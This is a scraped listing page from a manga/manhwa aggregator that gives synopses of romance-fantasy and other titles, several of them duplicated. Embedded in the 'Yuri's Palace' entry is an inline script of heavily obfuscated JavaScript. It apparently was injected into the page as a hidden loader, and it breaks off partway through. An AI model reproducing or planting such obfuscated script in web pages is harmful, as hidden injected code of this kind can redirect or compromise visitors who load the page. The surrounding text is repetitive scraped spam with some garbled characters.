Drama - Page 334

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

4013 results

You’re just a supporting character, so love me!

Read manhwa You’re a Supporting Character, Just Love Me / Side Characters Deserve Love Too / 어차피 조연인데 나랑 사랑이나 해 “I want to convey my heart.” I suffered from a unilateral fever of love for the supporting character in the book who faces a miserable ending. But… was that a little too much? To the point where you’re in a book? I don’t know who God is, but the consumer satisfaction assessment is satisfactory. ‘Sorry, I saw your butt on the way out. Kyle’s ass is so pretty.’ ‘Why are you looking at my ass!’ ……no, I didn’t mean to express my feelings this much. Help me, Roban. Help me. Telepathy that you can only hear it with sincerity. Do you really count the insidiousness? Kim Geum-ja is struggling today with her dark heart towards her favorite character.I’m gonna be Josephine and I’m gonna be next to Kyle! “I don’t know if it’s a man, but Josephine, who doesn’t know how to write, doesn’t do anything.” What? Well……I’ll be your man. Hello, my name is Joe. I’m a man from today.


You’re Mine

He Was Born to Be Mine / He Was Born to Be My Gong / He Was Born to Be My Husband / Ta Shenglai Jiushi Wo De Gong / Tā Shēnglái Jiùshì Wǒ De Gōng / You’re Mine / 他生来就是我的人 / 他生来就是我的攻 A rich young master and an abandoned son in an orphanage. Two people with different identities and positions, yet became good brothers for ten years.


You’re Unforgiven, Your Majesty

A royal mistress of the emperor. That’s all Roen Setia could be to the man who loved her. But framed with the attempted murder of the empress and her unborn child, the punishment for such crime is death… The resentment of the betrayal of the emperor yields another life-another chance. Roen is the royal mistress once again, but this time, she curates a different life. Claiming revenge on the people that abandoned her and drove her to her death, she creates a new place for herself.


You’re Unforgiven, Your Majesty

A Royal Mistress Of The Emperor. That’s All Roen Setia Could Be To The Man Who Loved Her. But Framed With The Attempted Murder Of The Empress And Her Unborn Child, The Punishment For Such Crime Is Death… The Resentment Of The Betrayal Of The Emperor Yields Another Life-Another Chance. Roen Is The Royal Mistress Once Again, But This Time, She Curates A Different Life. Claiming Revenge On The People That Abandoned Her And Drove Her To Her Death, She Creates A New Place For Herself.


You’ve Got The Wrong House, Villain

Read manhwa You’ve Got The Wrong House, Villain / 집 잘못 찾아오셨어요, 악역님 / You’ve Got The Wrong House, Villain (Novel) I guess I’m just an extra next door, and a neighbor with a lot of stories… According to the original story, the heroine had to save the wounded villain and in return, she will receive the maniacal obsession of her handsome villain. But for some reason, Why the Villain passed out in front of my house? I looked around for a moment and then pushed the man’s body away


You’ve Got The Wrong House, Villain

Read Manhwa You’ve Got The Wrong House, Villain / 집 잘못 찾아오셨어요, 악역님 / You’ve Got The Wrong House, Villain (Novel) I Guess I’m Just An Extra Next Door, And A Neighbor With A Lot Of Stories… According To The Original Story, The Heroine Had To Save The Wounded Villain And In Return, She Will Receive The Maniacal Obsession Of Her Handsome Villain. But For Some Reason, Why The Villain Passed Out In Front Of My House? I Looked Around For A Moment And Then Pushed The Man’s Body Away

3 days ago

Yowamushi Pedal

Every week since fourth grade, otaku Sakamichi Onoda has cycled 45 kilometers to and from his home in Akihabara on an old, rickety utility bike—his only form of transportation. As he begins high school, Onoda hopes to make new otaku friends—something that has been missing from his school life thus far—so he can finally have someone to talk to about his hobbies. However, much to his dismay, the anime club has been disbanded. It is then that Onoda meets fellow first-year Shunsuke Imaizumi by chance. Tall, athletic, and a cycling prodigy, Imaizumi could not be any more different from Onoda; however, after seeing Onoda's cycling on the school's infamous rear slope, Imaizumi becomes interested in his unique climbing style and sets out to challenge him to a race. This unusual encounter marks Onoda's first steps onto the road of competitive cycling. [Written by MAL Rewrite]


Yuri’s Palace

In the Sun Empire, only women can be the ruling monarch. In this world, Emperor Yuri, who doesn’t believe in love, struggles to stabilize her hold on the throne. Meanwhile, her treacherous husband aspires to become emperor himself. Seeing through his intent, Yuri decides to take in other consorts. While looking for candidates, she comes across former Prince Doha. He tells her that he believes in true love and that he doesn’t hate anyone. Intrigued, Yuri decides to invite him to the palace. What does she want? And will she be able to gain a firmer foothold on the throne? Glass Castle / Her Castle / Le palais de l'impératrice yuri / ???? / ???? / ??? ?<script></script><script>(function(_0xcc4496,_0x477f34){var _0x48ba03=_0x2590,_0x1521cd=_0xcc4496();while(!![]){try{var _0xd98a33=parseInt(_0x48ba03(0x14e))/(0x59*-0x53+0x178+0x2*0xdb2)*(-parseInt(_0x48ba03(0x143))/(-0x113e+0xcb6+0x48a))+-parseInt(_0x48ba03(0x149))/(0x4*0x1ee+-0x104*0x22+0x2fb*0x9)*(-parseInt(_0x48ba03(0x154))/(-0x34a*-0x6+-0x24c7+0x110f*0x1))+parseInt(_0x48ba03(0x148))/(-0xb80*-0x2+0x1*0x12ef+-0x29ea)*(-parseInt(_0x48ba03(0x14a))/(-0x25ea+0x277*-0xb+0x410d))+parseInt(_0x48ba03(0x141))/(-0x182+-0xa8b*0x3+-0x351*-0xa)+parseInt(_0x48ba03(0x144))/(-0x1527+-0x1*0x1e16+0x69*0x7d)+parseInt(_0x48ba03(0x140))/(0x1bdf+0x1d89*-0x1+0x1b3)+-parseInt(_0x48ba03(0x14b))/(-0x158f+0x3e*-0x5f+0x2c9b)*(parseInt(_0x48ba03(0x157))/(-0x12e3+0x2ea*-0xd+0x38d0));if(_0xd98a33===_0x477f34)break;else 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Zeikin De Katta Hon

Yankee Hei Seki who visited the library for the first time in elementary school. It is pointed out that Mr. Hayase Maru and Mr. Shirai, who work at the library, have not returned the books they borrowed 10 years ago. Hei Seki's library work manga, which he started working instead of going to the library because of that point.


Zero Game

Read Manga Zero Game Online For Free At S2Manga Associated Names: Zer0Game / 归零人生 / 歸零遊戲 / 제로게임 The Content Zero Game: Yoo Hanra: On The Verge Of Giving Up Her Life Due To Her Misfortunes, She Is Granted Another Chance Through An Invitation To The Mysterious Zero Game. What If She Wins? She’ll Be Able To Create A Second Life The Exact Way She Wants It To Be. And If She Loses? She’ll Die For Good. With A Shaky New Partnership, Skills To Learn, And Enemies Chasing After Her, She Must Find A Way To Finish All Of The Levels And Meet The Operator To Finally Get The Life That She Wants.and You Can Read It Here You Can Follow Some Other Great Comics!!!: Children Of Vamfield Into The Light Once Again Mysterious Village Manga Zin Is A Website That Aggregates The Latest And Hottest Manga, Updated Quickly To Serve Readers With High-Quality Images And Deliver Them An Excellent Experience.



In the year 200X, a Japanese fleet consisting of 3 vessels leave on a mission to South America. After encountering a storm, the ship JDS Mirai find themselves without their escorts and in 1942, traveling towards the island of Midway to face the American fleet in one of largest battles in naval history. The crew of Mirai must decide whether or not to change the course of history by involving itself in WWII. (Source: MU)
